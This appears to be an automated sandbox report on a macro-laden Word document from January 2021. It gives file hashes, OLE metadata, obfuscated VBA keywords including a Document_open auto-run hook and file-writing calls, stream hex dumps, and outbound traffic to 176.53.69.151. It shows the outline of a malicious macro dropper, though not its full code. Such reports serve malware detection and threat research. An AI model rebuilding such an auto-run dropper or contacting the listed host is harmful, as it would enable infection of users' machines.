                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: withdrawal Sports, Toys & Health budgetary management architectures Borders synthesize SSL Usability synergize e-commerce, Author: Julie Bernard, Template: Normal.dotm, Last Saved By: Carla Remy, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 06:14:00 2021, Last Saved Time/Date: Tue Jan 5 06:14:00 2021, Number of Pages: 1, Number of Words: 3222, Number of Characters: 18371, Security: 8
                                    Entropy (8bit):6.6858064178991
                                    TrID:
                                    • Microsoft Word document (32009/1) 79.99%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                    File name:bestand-8881014518 00944.doc
                                    File size:172631
                                    MD5:8ce4185f17ed35f43462f2f44c1cfc3d
                                    SHA1:9c6396150dd23a65c36e84af69e15543cedca4d2
                                    SHA256:4425de724449dedb3b183a3bfd567f9d3449c2457a1e2fd695019b1b6227e035
                                    SHA512:cbf15287a8efcb602e445140d62875f313263581ff98f2950be2e60864de867d2b3420741beae9b653b5f2ad90fcbcb712c7a9a98de5802c943d44665835eb44
                                    SSDEEP:3072:59ufstRUUKSns8T00JSHUgteMJ8qMD7grCeISWpqbd:59ufsfgIf0pLr7I/Od
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash:e4eea2aaa4b4b4a4

                                    Static OLE Info

                                    General

                                    Document Type:OLE
                                    Number of OLE Files:1

                                    OLE File "bestand-8881014518 00944.doc"

                                    Indicators

                                    Has Summary Info:True
                                    Application Name:Microsoft Office Word
                                    Encrypted Document:False
                                    Contains Word Document Stream:True
                                    Contains Workbook/Book Stream:False
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:
                                    Flash Objects Count:
                                    Contains VBA Macros:True

                                    Summary

                                    Code Page:1252
                                    Title:
                                    Subject:withdrawal Sports, Toys & Health budgetary management architectures Borders synthesize SSL Usability synergize e-commerce
                                    Author:Julie Bernard
                                    Keywords:
                                    Comments:
                                    Template:Normal.dotm
                                    Last Saved By:Carla Remy
                                    Revision Number:1
                                    Total Edit Time:0
                                    Create Time:2021-01-05 06:14:00
                                    Last Saved Time:2021-01-05 06:14:00
                                    Number of Pages:1
                                    Number of Words:3222
                                    Number of Characters:18371
                                    Creating Application:Microsoft Office Word
                                    Security:8

                                    Document Summary

                                    Document Code Page:-535
                                    Number of Lines:153
                                    Number of Paragraphs:43
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:917504

                                    Streams with VBA

                                    VBA File Name: Oi5oelv0_s4, Stream Size: 17886
                                    General
                                    Stream Path:Macros/VBA/Oi5oelv0_s4
                                    VBA File Name:Oi5oelv0_s4
                                    Stream Size:17886
                                    Data ASCII:. . . . . . . . . | . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . [ k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 93 30 00 00 00 00 00 00 01 00 00 00 ae c5 5b 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                    VBA Code Keywords

                                    Keyword
                                    DyjPBI
                                    dLrgANHCG
                                    EajdMLeD
                                    rgBSB
                                    Object
                                    yjNpyrf
                                    rJqMZII
                                    PGiog
                                    T_dehutl_mggmhizd
                                    EUMDPGt
                                    xkJxAAC
                                    AybxtEBCJ.Close
                                    JhiYfXc:
                                    VusSK
                                    "fUwLgjVtQyH"
                                    UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                                    bGnhXCA
                                    VJbwzTDT.Close
                                    VwnpBElhO
                                    MMAqSI
                                    UPhhYZEF
                                    "bVawaPADALVlWFFA"
                                    NFWzF
                                    "HiTyACJmCuGQFFJ"
                                    sGvJJWh
                                    PmBxcD:
                                    SfMKIOk
                                    "TthascRlxHZH"
                                    AybxtEBCJ:
                                    SFmrEDJ
                                    zOBhOx
                                    fUGQf
                                    numuq
                                    rEeiBJ
                                    ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                                    RkPWCDPC
                                    JADCpjk
                                    PmBxcD
                                    pDPzBJmM
                                    bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                                    WSARpB
                                    EUMDPGt.Close
                                    HnBvAEH
                                    "WXovaGHxqSlUt"
                                    QEIFFM
                                    bPFNuJ.WriteLine
                                    "PzrrnIFtpmxAx"
                                    EUMDPGt:
                                    ilONFzHG
                                    "akTuJaIGmZrUyF"
                                    qpOWEIHHA
                                    yJouG
                                    XwZxsHCGt
                                    FTalMbF
                                    XDJPUW
                                    "ALpzEMcwuWl"
                                    gQxBD:
                                    UUoAB
                                    tcYiEMeRH.Close
                                    nIHrI
                                    eUdbDAHHs.WriteLine
                                    "uJnfBHIPFKBxHBmEE"
                                    FPWaF
                                    JADCpjk.WriteLine
                                    xxYeFGUAH
                                    rfDgD
                                    njKwJdA.WriteLine
                                    "bOOXnOJYtbRAbm"
                                    VJbwzTDT:
                                    RkPWCDPC:
                                    UPhhYZEF.Close
                                    eWkHqVao
                                    Resume
                                    XKPUEfhk
                                    RLurCDDF
                                    gglHam
                                    "budRDJKVnJRU"
                                    DRrKpoA
                                    "]an"
                                    lgZgGO
                                    "gcZaHCGUVJsFmL"
                                    "yKdJWHAniqHFCB"
                                    ThHBBDu
                                    tcYiEMeRH.WriteLine
                                    waSbS
                                    VfJHAA
                                    vutdEkdRL
                                    NSiRQzd
                                    "frvvJFHIkftmZHE"
                                    OtQPAJH
                                    AybxtEBCJ.WriteLine
                                    XTdPHz
                                    OBwIBy:
                                    JADCpjk.Close
                                    QZjuH
                                    "DkRmTYGAMxqHI"
                                    zOQlGPVC
                                    "dWnMFoTBPDqeJK"
                                    jPnRGLC
                                    CbMZSLFAM
                                    kboRA
                                    ORIzFDySE
                                    DRrKpoA.Close
                                    VAEDpBCV
                                    uJSEDH:
                                    QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                                    "bAurYaGPwGKRiG"
                                    bPFNuJ
                                    "koDuGqAOJBlLgZIEme"
                                    DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                                    hiZkEEF.WriteLine
                                    txKQv
                                    xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                                    vtDUw
                                    RkPWCDPC.WriteLine
                                    aLGptGA
                                    "kWzGMzIVefGB"
                                    "ncDMUIadusSIDx"
                                    VB_Name
                                    RkPWCDPC.Close
                                    "JCgblEAJizSfW"
                                    uJSEDH
                                    eUdbDAHHs.Close
                                    "HfXAPQQbXKJHFGu"
                                    eBddHTXP
                                    AybxtEBCJ
                                    OBwIBy
                                    RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                                    VJbwzTDT.WriteLine
                                    ItSfCDCB
                                    Mid(Application.Name,
                                    JhiYfXc.Close
                                    PAxhJ
                                    "TJahKRWdrvHFIy"
                                    xOnWA
                                    xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                                    "lRcGHADAHrlHJJA"
                                    oOysMtDG
                                    syDRd
                                    dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                                    cTfCJ
                                    hiZkEEF
                                    "GhifcDKlpA"
                                    oOysMtDG.WriteLine
                                    FgmzCEm
                                    bPFNuJ:
                                    "HwixyOCYxmojd"
                                    UMzHfyAfA
                                    oOysMtDG:
                                    "eSpcpGDZncccrFb"
                                    oMcHDXEF
                                    reTrs
                                    "BWSOKPyHMnSQxi"
                                    EJEApM
                                    JADCpjk:
                                    XjhOHEMDC
                                    gQxBD
                                    "xtsHGQjpNzDIYJ"
                                    pSFXACJ
                                    wUoJIFDD
                                    HOkLRDGd
                                    njKwJdA.Close
                                    RvFOAEPH
                                    HMyHCQCGu
                                    njKwJdA
                                    "GqMIEnOQFEEDsE"
                                    bGMXEIA
                                    eUdbDAHHs:
                                    rtGyqOth
                                    wuKBFvqI
                                    hSbDPCC
                                    hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                                    rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                                    cSHkDL
                                    blQEM
                                    nKtfECko
                                    RUMGE
                                    Zpeehqbjjey.Create
                                    uJSEDH.WriteLine
                                    xNJyUCNg
                                    "BQumCJmmiAGIKv"
                                    yyoqEHETu
                                    GNnZJzE
                                    HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                                    yUWxTlVAC
                                    TxAVq
                                    EVOuqJnGD
                                    "cnLcFxEphoEbAFA"
                                    CksLJVJ
                                    PmBxcD.Close
                                    njKwJdA:
                                    XsKjcKE
                                    "GDTGdEJpuRnDBFQ"
                                    "ZRotGHIxyrpSqvsXCC"
                                    SOunIGkF
                                    "]anw["
                                    JhiYfXc
                                    ChWZVJiB
                                    lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                                    "OnehVAaWbfCAcAjsG"
                                    iytziJ
                                    "ohaTGaUTSwwDv"
                                    "qMnfwCwbPJC"
                                    "vRrzDEngIQvFPJfE"
                                    zgBjJOGEH
                                    tcYiEMeRH:
                                    OBwIBy.Close
                                    NtpdEJDH
                                    gQxBD.WriteLine
                                    "WMwcBSqFohy"
                                    EUMDPGt.WriteLine
                                    gQxBD.Close
                                    PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                                    QrVtQr
                                    VJbwzTDT
                                    UPhhYZEF.WriteLine
                                    uJSEDH.Close
                                    Zpeehqbjjey
                                    RNgUODjsM
                                    NBjEFGnEA
                                    oOysMtDG.Close
                                    YzIkA
                                    tcYiEMeRH
                                    xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                                    "TOSxJaIzCudpDlB"
                                    fUDmDCt
                                    "utFMeJhUKJhJ"
                                    aTfPCap
                                    "SjDfYFUFPynYGu"
                                    wCjuwBBGN
                                    JHrNWdBsW
                                    bPFNuJ.Close
                                    XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                                    "rVpvDaGGxNfeNUF"
                                    hiZkEEF.Close
                                    Nothing
                                    UPhhYZEF:
                                    IYKcgC
                                    dTtuVsDVA
                                    VcIiQJFi
                                    JhiYfXc.WriteLine
                                    "jVSXGfhYCxoHFD"
                                    lEOlGYxK
                                    "ozrZBTZBTMMIBB"
                                    hiZkEEF:
                                    "goMgGBdJMUDLAG"
                                    WtNcAKUFt
                                    "MvkIFCHFTnRqD"
                                    PmBxcD.WriteLine
                                    rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                                    SynsDAgHG
                                    "PFQdBLHsDnfTZv"
                                    vitXEH
                                    "OTLmJCwhyQMFzlB"
                                    oUWfJGBeE
                                    "OcgtIFEeoIFhxt"
                                    Error
                                    "lHuxHADjraNFBgI"
                                    CCnbXRBeA
                                    AiICOj
                                    VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                                    CmcBTTABc
                                    Attribute
                                    CHKzNBD
                                    TFXNGIiH
                                    "cGDcNrWsPeGCDF"
                                    LVadAF
                                    mmkTuwH
                                    eUdbDAHHs
                                    Function
                                    VbMBBgf
                                    MfgnKGWI
                                    ukrnIFCE
                                    EbuwEJS
                                    WxujBIAMz
                                    DRrKpoA:
                                    "dvqIBFEqwfkI"
                                    kskMAAHA
                                    OBwIBy.WriteLine
                                    xCaTC
                                    zLkRiC
                                    DRrKpoA.WriteLine
                                    "dxIGdcCHBKYgde"
                                    VBA Code
                                    VBA File Name: Qafkrimwsho, Stream Size: 697
                                    General
                                    Stream Path:Macros/VBA/Qafkrimwsho
                                    VBA File Name:Qafkrimwsho
                                    Stream Size:697
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 ae c5 45 f2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                    VBA Code Keywords

                                    Keyword
                                    Attribute
                                    VB_Name
                                    "Qafkrimwsho"
                                    VBA Code
                                    VBA File Name: Wm_t404p8v_, Stream Size: 1106
                                    General
                                    Stream Path:Macros/VBA/Wm_t404p8v_
                                    VBA File Name:Wm_t404p8v_
                                    Stream Size:1106
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 ae c5 f3 f6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                    VBA Code Keywords

                                    Keyword
                                    False
                                    Private
                                    VB_Exposed
                                    Attribute
                                    VB_Creatable
                                    VB_Name
                                    Document_open()
                                    VB_PredeclaredId
                                    VB_GlobalNameSpace
                                    VB_Base
                                    VB_Customizable
                                    VB_TemplateDerived
                                    VBA Code

                                    Streams

                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                    General
                                    Stream Path:\x1CompObj
                                    File Type:data
                                    Stream Size:146
                                    Entropy:4.00187355764
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.279952994103
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 544
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:544
                                    Entropy:4.15718276186
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                    Stream Path: 1Table, File Type: data, Stream Size: 6424
                                    General
                                    Stream Path:1Table
                                    File Type:data
                                    Stream Size:6424
                                    Entropy:6.13606471955
                                    Base64 Encoded:True
                                    Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                    Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                    Stream Path: Data, File Type: data, Stream Size: 99189
                                    General
                                    Stream Path:Data
                                    File Type:data
                                    Stream Size:99189
                                    Entropy:7.39018675385
                                    Base64 Encoded:True
                                    Data ASCII:u . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . { . . B g . . . m d . z . M . . . . . . . . . . . . D . . . . . . . . F . . . . . . { . . B g . . . m d . z . M . . . . . . . .
                                    Data Raw:75 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 488
                                    General
                                    Stream Path:Macros/PROJECT
                                    File Type:ASCII text, with CRLF line terminators
                                    Stream Size:488
                                    Entropy:5.44671163464
                                    Base64 Encoded:True
                                    Data ASCII:I D = " { 3 2 8 4 0 4 E F - 4 1 6 C - 4 D E 8 - 9 A 4 2 - 2 0 1 5 6 D 2 2 2 C 2 6 } " . . D o c u m e n t = W m _ t 4 0 4 p 8 v _ / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Q a f k r i m w s h o . . M o d u l e = O i 5 o e l v 0 _ s 4 . . E x e N a m e 3 2 = " T j 8 d t f s u o p d k " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 0 1 2 B 2 B 0 B 6 B 0 B 6 B 0 B 6 B 0 B 6 " . . D P B = " 8 2 8 0 2 0 5 0 9 3 5 1 9 3
                                    Data Raw:49 44 3d 22 7b 33 32 38 34 30 34 45 46 2d 34 31 36 43 2d 34 44 45 38 2d 39 41 34 32 2d 32 30 31 35 36 44 32 32 32 43 32 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 57 6d 5f 74 34 30 34 70 38 76 5f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 51 61 66 6b 72 69 6d 77 73 68 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 69 35 6f 65 6c 76 30 5f 73 34 0d 0a 45 78 65 4e 61 6d 65 33 32 3d
                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 110
                                    General
                                    Stream Path:Macros/PROJECTwm
                                    File Type:data
                                    Stream Size:110
                                    Entropy:3.60650024781
                                    Base64 Encoded:False
                                    Data ASCII:W m _ t 4 0 4 p 8 v _ . W . m . _ . t . 4 . 0 . 4 . p . 8 . v . _ . . . Q a f k r i m w s h o . Q . a . f . k . r . i . m . w . s . h . o . . . O i 5 o e l v 0 _ s 4 . O . i . 5 . o . e . l . v . 0 . _ . s . 4 . . . . .
                                    Data Raw:57 6d 5f 74 34 30 34 70 38 76 5f 00 57 00 6d 00 5f 00 74 00 34 00 30 00 34 00 70 00 38 00 76 00 5f 00 00 00 51 61 66 6b 72 69 6d 77 73 68 6f 00 51 00 61 00 66 00 6b 00 72 00 69 00 6d 00 77 00 73 00 68 00 6f 00 00 00 4f 69 35 6f 65 6c 76 30 5f 73 34 00 4f 00 69 00 35 00 6f 00 65 00 6c 00 76 00 30 00 5f 00 73 00 34 00 00 00 00 00
                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5146
                                    General
                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                    File Type:data
                                    Stream Size:5146
                                    Entropy:5.51240945881
                                    Base64 Encoded:False
                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 630
                                    General
                                    Stream Path:Macros/VBA/dir
                                    File Type:data
                                    Stream Size:630
                                    Entropy:6.3062184781
                                    Base64 Encoded:True
                                    Data ASCII:. r . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                                    Data Raw:01 72 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 08 e2 e3 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                    Stream Path: WordDocument, File Type: data, Stream Size: 25134
                                    General
                                    Stream Path:WordDocument
                                    File Type:data
                                    Stream Size:25134
                                    Entropy:3.92042329439
                                    Base64 Encoded:False
                                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . Y \\ . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . b . . . b . . . Y T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 59 5c 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 62 00 00 62 7f 00 00 62 7f 00 00 59 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jan 6, 2021 08:53:38.151053905 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.240463972 CET | 80 | 49165 | 176.53.69.151 | 192.168.2.22
                                    Jan 6, 2021 08:53:38.240595102 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
                                    Jan 6, 2021 08:53:38.242799044 CET | 49165 | 80 | 192.168.2.22 | 176.53.69.151
